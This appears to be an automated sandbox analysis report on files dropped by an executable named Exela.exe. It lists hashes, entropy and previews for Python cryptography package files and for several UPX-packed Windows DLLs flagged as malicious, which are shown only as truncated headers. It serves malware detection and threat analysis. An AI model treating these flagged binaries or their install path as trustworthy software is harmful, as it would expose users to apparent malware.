                                                                                                                                                                                                                                                          SSDEEP:192:nUDG5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEnQHbHR:UIvlKM1zJlFvmNz5VrlkTS0QHt
                                                                                                                                                                                                                                                          MD5:4E168CCE331E5C827D4C2B68A6200E1B
                                                                                                                                                                                                                                                          SHA1:DE33EAD2BEE64352544CE0AA9E410C0C44FDF7D9
                                                                                                                                                                                                                                                          SHA-256:AAC73B3148F6D1D7111DBCA32099F68D26C644C6813AE1E4F05F6579AA2663FE
                                                                                                                                                                                                                                                          SHA-512:F451048E81A49FBFA11B49DE16FF46C52A8E3042D1BCC3A50AAF7712B097BED9AE9AED9149C21476C2A1E12F1583D4810A6D36569E993FE1AD3879942E5B0D52
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial ow
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1532
                                                                                                                                                                                                                                                          Entropy (8bit):5.058591167088024
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:MjUnoorbOFFTJJyRrYFTjzMbmqEvBTP4m96432s4EOkUTKQROJ32s3yxsITf+3tY:MkOFJSrYJsaN5P406432svv32s3EsIqm
                                                                                                                                                                                                                                                          MD5:5AE30BA4123BC4F2FA49AA0B0DCE887B
                                                                                                                                                                                                                                                          SHA1:EA5B412C09F3B29BA1D81A61B878C5C16FFE69D8
                                                                                                                                                                                                                                                          SHA-256:602C4C7482DE6479DD2E9793CDA275E5E63D773DACD1ECA689232AB7008FB4FB
                                                                                                                                                                                                                                                          SHA-512:DDBB20C80ADBC8F4118C10D3E116A5CD6536F72077C5916D87258E155BE561B89EB45C6341A1E856EC308B49A4CB4DBA1408EABD6A781FBE18D6C71C32B72C41
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:Copyright (c) Individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... 3. Neither the name of PyCA Cryptography nor the names of its contributors. may be used to endorse or promote products derived from this software. without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOS
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):5430
                                                                                                                                                                                                                                                          Entropy (8bit):5.111831778200942
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:DxZpqZink/QIHQIyzQIZQILuQIR8vtklGovuxNx6rIWwCvCCcT+vIrrr9B+M6VwP:xJnkoBs/stL18cT+vIrrxsM6VwDjyeyM
                                                                                                                                                                                                                                                          MD5:AD313397AABF8AF5D234DF73C901CB4D
                                                                                                                                                                                                                                                          SHA1:B213A420B73EACF37409BC428812B3E17F1C12C9
                                                                                                                                                                                                                                                          SHA-256:65479522961A5B9B1C4811232C4133DDC8BDA9BBBC7562B81EF76857A2A2475A
                                                                                                                                                                                                                                                          SHA-512:468BD32AABA49839D4A4752108A378954900037588B7095B318179D64F76F4302ADEBCFA1664CEE5CC390AD0EEA79A611A7B5C372548FEA22DF77C2A459DA2AF
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:Metadata-Version: 2.1..Name: cryptography..Version: 42.0.5..Summary: cryptography is a package which provides cryptographic recipes and primitives to Python developers...Author-email: The Python Cryptographic Authority and individual contributors <cryptography-dev@python.org>..License: Apache-2.0 OR BSD-3-Clause..Project-URL: homepage, https://github.com/pyca/cryptography..Project-URL: documentation, https://cryptography.io/..Project-URL: source, https://github.com/pyca/cryptography/..Project-URL: issues, https://github.com/pyca/cryptography/issues..Project-URL: changelog, https://cryptography.io/en/latest/changelog/..Classifier: Development Status :: 5 - Production/Stable..Classifier: Intended Audience :: Developers..Classifier: License :: OSI Approved :: Apache Software License..Classifier: License :: OSI Approved :: BSD License..Classifier: Natural Language :: English..Classifier: Operating System :: MacOS :: MacOS X..Classifier: Operating System :: POSIX..Classifier: Operating Syst
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):15325
                                                                                                                                                                                                                                                          Entropy (8bit):5.564361384046864
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:GXPJR2R5jF4elqZVhFu4KoF9vZ6FGotqw++NXwvn5tnl:GXf2bCP+onvZ6FGotqw++9wvnd
                                                                                                                                                                                                                                                          MD5:97E6C654F93C1D5979CB439B900BA89C
                                                                                                                                                                                                                                                          SHA1:AD1F3A5ACC61EE75693F7CEE0AD4FF1255C2D0DF
                                                                                                                                                                                                                                                          SHA-256:E2E749B8C2F61371740A4EA821035B23DD7A88CDD8542685633AB94802F79B54
                                                                                                                                                                                                                                                          SHA-512:B7A749005AE639DED57D64F6475D957FBC8850B24CAF86620DD8F3ADDD6E8C9D816C04ED400617E9DDA46883917528306F0F94DABDDACDB29FE399F98E3DDB64
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:cryptography-42.0.5.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..cryptography-42.0.5.dist-info/LICENSE,sha256=Pgx8CRqUi4JTO6mP18u0BDLW8amsv4X1ki0vmak65rs,197..cryptography-42.0.5.dist-info/LICENSE.APACHE,sha256=qsc7MUj20dcRHbyjIJn2jSbGRMaBOuHk8F9leaomY_4,11360..cryptography-42.0.5.dist-info/LICENSE.BSD,sha256=YCxMdILeZHndLpeTzaJ15eY9dz2s0eymiSMqtwCPtPs,1532..cryptography-42.0.5.dist-info/METADATA,sha256=ZUeVIpYaW5scSBEjLEEz3ci9qbu8dWK4HvdoV6KiR1o,5430..cryptography-42.0.5.dist-info/RECORD,,..cryptography-42.0.5.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..cryptography-42.0.5.dist-info/WHEEL,sha256=ZzJfItdlTwUbeh2SvWRPbrqgDfW_djikghnwfRmqFIQ,100..cryptography-42.0.5.dist-info/top_level.txt,sha256=KNaT-Sn2K4uxNaEbe6mYdDn3qWDMlp4y-MtWfB73nJc,13..cryptography/__about__.py,sha256=Q_dIPaB2u54kbfNQMzqmbel-gbG6RC5vWzO6OSFDGqM,445..cryptography/__init__.py,sha256=iVPlBlXWTJyiFeRedxcbMPhyHB34viOM10d72vGnWuE,364..cryptography/__pycache__/_
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):100
                                                                                                                                                                                                                                                          Entropy (8bit):5.0203365408149025
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:RtEeX7MWcSlVlbY3KgP+tkKciH/KQLn:RtBMwlVCxWKTQLn
                                                                                                                                                                                                                                                          MD5:C48772FF6F9F408D7160FE9537E150E0
                                                                                                                                                                                                                                                          SHA1:79D4978B413F7051C3721164812885381DE2FDF5
                                                                                                                                                                                                                                                          SHA-256:67325F22D7654F051B7A1D92BD644F6EBAA00DF5BF7638A48219F07D19AA1484
                                                                                                                                                                                                                                                          SHA-512:A817107D9F70177EA9CA6A370A2A0CB795346C9025388808402797F33144C1BAF7E3DE6406FF9E3D8A3486BDFAA630B90B63935925A36302AB19E4C78179674F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.42.0).Root-Is-Purelib: false.Tag: cp39-abi3-win_amd64..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):13
                                                                                                                                                                                                                                                          Entropy (8bit):3.2389012566026314
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:cOv:Nv
                                                                                                                                                                                                                                                          MD5:E7274BD06FF93210298E7117D11EA631
                                                                                                                                                                                                                                                          SHA1:7132C9EC1FD99924D658CC672F3AFE98AFEFAB8A
                                                                                                                                                                                                                                                          SHA-256:28D693F929F62B8BB135A11B7BA9987439F7A960CC969E32F8CB567C1EF79C97
                                                                                                                                                                                                                                                          SHA-512:AA6021C4E60A6382630BEBC1E16944F9B312359D645FC61219E9A3F19D876FD600E07DCA6932DCD7A1E15BFDEAC7DBDCEB9FFFCD5CA0E5377B82268ED19DE225
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:cryptography.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):2104832
                                                                                                                                                                                                                                                          Entropy (8bit):7.99971219090206
                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                          SSDEEP:49152:1je4RfZnWigT4YT6JsruXKiYfXUgM9pV72fF2SBFf:d/xWiC4RIyK5XG9pxq3f
                                                                                                                                                                                                                                                          MD5:001536E476BF36E77C61E5E60D96EA76
                                                                                                                                                                                                                                                          SHA1:79F4768CF796262FEBD62F7D9D3D510F6C9D816F
                                                                                                                                                                                                                                                          SHA-256:364C6887349315AFE5343BB2613002CD2B860AF427A76AECEAB591272B6F50A5
                                                                                                                                                                                                                                                          SHA-512:948141C8EEE69E20F3497520FCDD2836AAB6D01A16A9639AEF0869795CA454B684BEC79A77BF1C16DA2A339EE4ADAF56AC6C839C15B5E4EF912D5D94EDB83A90
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........r.Fs..Fs..Fs..O...Ts.....Ds.....Ws.....Ns.....Bs..|...Ds..Fs..gq.....Ws..)...0p.....Gs..Fs...s.....Gs.....Gs..RichFs..........................PE..d....A.e.........." ...'. .......O.@.o...O..................................@o...........`.........................................(5o.p....0o.(............Pj..M...........5o.$...........................P!o.(...p"o.@...........................................UPX0......O.............................UPX1..... ...O... .................@...UPX2.........0o....... .............@......................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):36352
                                                                                                                                                                                                                                                          Entropy (8bit):7.843168848110761
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:5S6WTnXeaMytX+TkQ5l1b2YyvPBsDNFyMCipcL:5S6WDuaM6XuvZyuaMEL
                                                                                                                                                                                                                                                          MD5:15B0DF96344BAF6A4C72766721943E52
                                                                                                                                                                                                                                                          SHA1:A3666E88594D1EC97DE23B9242F346C43A34C070
                                                                                                                                                                                                                                                          SHA-256:ABB6F497003738DB2407B01DFA0ABC61F6BC7FDB2452C52F76AB11F5430D844F
                                                                                                                                                                                                                                                          SHA-512:4FBF295D0882646B8C4B3284F11331FB12767FD1404D78D3E4D88A434896058C2DF05DD1A2D9C8CE696D2D3AAD8C7251D00D95C399DF2E8C11BB319F87A4385E
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!\5.@2f.@2f.@2f.8.f.@2f.?3g.@2f.83g.@2f.?7g.@2f.?6g.@2f.?1g.@2fK=3g.@2f.@3f.@2f..:g.@2f..2g.@2f...f.@2f..0g.@2fRich.@2f................PE..d.....{e.........." ...%.........0.......@................................................`.............................................h....................p..(.......................................................@...........................................UPX0.....0..............................UPX1.........@......................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1189728
                                                                                                                                                                                                                                                          Entropy (8bit):7.945107908450931
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24576:LffQrZJIe6/4gho5HE1F03fkOyUU/BtSIgA0ft+rBFOWRIQ6sCY51CPwDv3uFfJv:rf8JWwgho5HL3fknPSIKorCU1CPwDv3a
                                                                                                                                                                                                                                                          MD5:86CFC84F8407AB1BE6CC64A9702882EF
                                                                                                                                                                                                                                                          SHA1:86F3C502ED64DF2A5E10B085103C2FFC9E3A4130
                                                                                                                                                                                                                                                          SHA-256:11B89CC5531B2A6B89FBBB406EBE8FB01F0BF789E672131B0354E10F9E091307
                                                                                                                                                                                                                                                          SHA-512:B33F59497127CB1B4C1781693380576187C562563A9E367CE8ABC14C97C51053A28AF559CDD8BD66181012083E562C8A8771E3D46ADEBA269A848153A8E9173C
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........a...2...2...2...2...2..3...2..3...2..3...2..3...2...2...2L.3...2..3...2..3.2..3...2..p2...2..3...2Rich...2........................PE..d...m..b.........." ... .........@%.025..P%..................................P7...........`......................................... H5......C5.h....@5......`2.............H7......................................=5.@...........................................UPX0.....@%.............................UPX1.........P%.....................@....rsrc........@5.....................@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):25336
                                                                                                                                                                                                                                                          Entropy (8bit):7.563490694087984
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:2Jvjb6KaBBu0wYkP2C0yZbMRpZa7gJXMrRCXPDG4y8c3UhH3:Ovj+3BcMp8KDG4yshH
                                                                                                                                                                                                                                                          MD5:DECBBA3ADD4C2246928AB385FB16A21E
                                                                                                                                                                                                                                                          SHA1:5F019EFF11DE3122FFA67A06D52D446A3448B75E
                                                                                                                                                                                                                                                          SHA-256:4B43C1E42F6050DDB8E184C8EC4FB1DE4A6001E068ECE8E6AD47DE0CC9FD4A2D
                                                                                                                                                                                                                                                          SHA-512:760A42A3EB3CA13FA7B95D3BD0F411C270594AE3CF1D3CDA349FA4F8B06EBE548B60CD438D68E2DA37DE0BC6F1C711823F5E917DA02ED7047A45779EE08D7012
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X................d.....N...................5...N......N......N....................................Rich............................PE..d....$(a.........." .....@................................................................`.....................................................................8.......................................................8...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):208224
                                                                                                                                                                                                                                                          Entropy (8bit):7.9214932539909775
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3072:FSI3oPlWLlPVVc5MpJa1pOjJnnioIZW8/Qf6bRXGKrs8qJjueW1LR/oSB6hetz:AIek5VC0FiHof6Z1rgJ63R/oS3
                                                                                                                                                                                                                                                          MD5:6CD33578BC5629930329CA3303F0FAE1
                                                                                                                                                                                                                                                          SHA1:F2F8E3248A72F98D27F0CFA0010E32175A18487F
                                                                                                                                                                                                                                                          SHA-256:4150EE603AD2DA7A6CB6A895CB5BD928E3A99AF7E73C604DE1FC224E0809FDB0
                                                                                                                                                                                                                                                          SHA-512:C236A6CCC8577C85509D378C1EF014621CAB6F6F4AA26796FF32D8EEC8E98DED2E55D358A7D236594F7A48646DC2A6BF25B42A37AED549440D52873EBCA4713E
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.p*..p*..p*......p*...+..p*.\.+..p*.../..p*......p*...)..p*...+..p*..p+.iq*......p*...*..p*.....p*...(..p*.Rich.p*.........PE..d......b.........." ... .....P...`..@....p................................................`..........................................6..4@...3.......0...........M...........v......................................@%..@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc....P...0...H..................@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                          Entropy (8bit):7.550806027936981
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:T6n6Apum7DurKkfFwr37/fgQZtR5DLURkUzLgV5tga2Za7gJXNug8:enppuYrkfIrHZrnDLarYVT4p9u
                                                                                                                                                                                                                                                          MD5:EEADED775EABFAAEDE5CA025F55FD273
                                                                                                                                                                                                                                                          SHA1:8EEFB3B9D85B4D5AD4033308F8AF2A24E8792E02
                                                                                                                                                                                                                                                          SHA-256:DB4D6A74A3301788D32905B2CCC525E9A8E2219F1A36924464871CF211F115A0
                                                                                                                                                                                                                                                          SHA-512:A6055D5604CC53428D89B308C223634CD94082BE0BA4081513974E1826775D6E9FC26180C816D9A38FEAD89B5E04C5E7CF729C056BFAE0ED74D6885C921B70AD
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........29T^SW.^SW.^SW.W+..\SW.K,V.\SW..+V.\SW.K,R.RSW.K,S.VSW.K,T.]SW.d.V.]SW.^SV.(SW.d._._SW.d.W._SW.d.._SW.d.U._SW.Rich^SW.........................PE..d...0..e.........." ...%.P...................................................@............`.........................................@2..d....0..P....0.......................2.......................................%..@...........................................UPX0....................................UPX1.....P.......H..................@....rsrc........0.......L..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):88440
                                                                                                                                                                                                                                                          Entropy (8bit):7.91548450445375
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:ad2ZG27LFRlz41ZjiW6lNaE+hCsoVZ268gtw9IV1upHqCnqEIDQhFh7SyDPxB:ad2ZVLZs2W6lNatksmlBtIIV1oFIDQhF
                                                                                                                                                                                                                                                          MD5:FE0E32BFE3764ED5321454E1A01C81EC
                                                                                                                                                                                                                                                          SHA1:7690690DF0A73BDCC54F0F04B674FC8A9A8F45FB
                                                                                                                                                                                                                                                          SHA-256:B399BFF10812E9EA2C9800F74CB0E5002F9D9379BAF1A3CEF9D438CACA35DC92
                                                                                                                                                                                                                                                          SHA-512:D1777F9E684A9E4174E18651E6D921AE11757ECDBEB4EE678C6A28E0903A4B9AB9F6E1419670B4D428EE20F86C7D424177ED9DAF4365CF2EE376FCD065C1C92D
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........P..1..1..1..IX..1..J..1..J..1..J..1..J..1..J..1.\C..1..1..1..J..1..J..1..J4..1..J..1.Rich.1.................PE..d...k.Vc.........." ...!. ..........@0... ...................................P............`..........................................L..P....I.......@.......................L......................................@<..@...........................................UPX0....................................UPX1..... ... ......................@....rsrc........@......."..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):65920
                                                                                                                                                                                                                                                          Entropy (8bit):6.085964919090515
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Apw/EsYpkVgBaz57kcDA7QKFmpz7cnzH/ks/KF61xubwmB1Cf//yhC74JFmpktJU:V/5k8cnzeJH9IDQ0K7SyOPx
                                                                                                                                                                                                                                                          MD5:34E49BB1DFDDF6037F0001D9AEFE7D61
                                                                                                                                                                                                                                                          SHA1:A25A39DCA11CDC195C9ECD49E95657A3E4FE3215
                                                                                                                                                                                                                                                          SHA-256:4055D1B9E553B78C244143AB6B48151604003B39A9BF54879DEE9175455C1281
                                                                                                                                                                                                                                                          SHA-512:EDB715654BAAF499CF788BCACD5657ADCF9F20B37B02671ABE71BDA334629344415ED3A7E95CB51164E66A7AA3ED4BF84ACB05649CCD55E3F64036F3178B7856
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q...e...e...e..km...e..ke...e..k....e..kg...e.Rich..e.................PE..d...\.Vc.........." ...!..................................................................`.........................................`...P................................)..............T............................................................................rdata..............................@..@.rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1701240
                                                                                                                                                                                                                                                          Entropy (8bit):7.993696827956843
                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                          SSDEEP:49152:I0/71KAZkPw/a5lsjIa7hhXBOQSbMS5ffODwKh/Wc:nziPwCvZalhXOMIzQd
                                                                                                                                                                                                                                                          MD5:DB09C9BBEC6134DB1766D369C339A0A1
                                                                                                                                                                                                                                                          SHA1:C156D9F2D0E80B4CF41794CD9B8B1E8A352E0A0B
                                                                                                                                                                                                                                                          SHA-256:B1AAC1E461174BBAE952434E4DAC092590D72B9832A04457C94BD9BB7EE8AD79
                                                                                                                                                                                                                                                          SHA-512:653A7FFF6A2B6BFFB9EA2C0B72DDB83C9C53D555E798EEA47101B0D932358180A01AF2B9DAB9C27723057439C1EAFFB8D84B9B41F6F9CD1C3C934F1794104D45
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ih.-...-...-...r../...r@.#...r..!...r..%...r..)...$q..7....{..&...-...H...r......r..,...rB.,...r..,...Rich-...........PE..d...R.Vc.........." ...!..........D...]...D...................................^...........`.........................................H.].......].......].......V../...........r^.....................................(.].@...........................................UPX0......D.............................UPX1..........D.....................@....rsrc.........].....................@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):24960
                                                                                                                                                                                                                                                          Entropy (8bit):7.407412042104121
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:5oxUAW1guHrhWgWLBNZa7gJXZjNID7Gu6OIYiSy1pCQlIJNPxh8E9VF0NyUT2:exjW1J2pJjNID7GuIYiSyvCPxWEC
                                                                                                                                                                                                                                                          MD5:C39459806C712B3B3242F8376218C1E1
                                                                                                                                                                                                                                                          SHA1:85D254FB6CC5D6ED20A04026BFF1158C8FD0A530
                                                                                                                                                                                                                                                          SHA-256:7CBD4339285D145B422AFA280CEE685258BC659806BE9CF8B334805BC45B29C9
                                                                                                                                                                                                                                                          SHA-512:B727C6D1CD451D658E174161135D3BE48D7EFDA21C775B8145BC527A54D6592BFC50919276C6498D2E2233AC1524C1699F59F0F467CC6E43E5B5E9558C87F49D
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>.t^_f'^_f'^_f'W'.'\_f'.$g&\_f'.$c&R_f'.$b&V_f'.$e&Z_f'.$g&\_f'^_g'._f'.-g&[_f'.$k&__f'.$f&__f'.$.'__f'.$d&__f'Rich^_f'........PE..d...e.Vc.........." ...!.0................................................................`......................................... ...L....................`..............l...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):622976
                                                                                                                                                                                                                                                          Entropy (8bit):7.993556519822549
                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                          SSDEEP:12288:67dpDQ1L3zfmrtWF/azVC9oAnShBJl4cZ1pzgULOX110jt3:cHSzzaQl8VSSh2cZXgULq11y
                                                                                                                                                                                                                                                          MD5:895F001AE969364432372329CAF08B6A
                                                                                                                                                                                                                                                          SHA1:4567FC6672501648B277FE83E6B468A7A2155DDF
                                                                                                                                                                                                                                                          SHA-256:F5DD29E1E99CF8967F7F81487DC624714DCBEC79C1630F929D5507FC95CBFAD7
                                                                                                                                                                                                                                                          SHA-512:05B4559D283EA84174DA72A6C11B8B93B1586B4E7D8CDA8D745C814F8F6DFF566E75F9D7890F32BD9DFE43485244973860F83F96BA39296E28127C9396453261
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
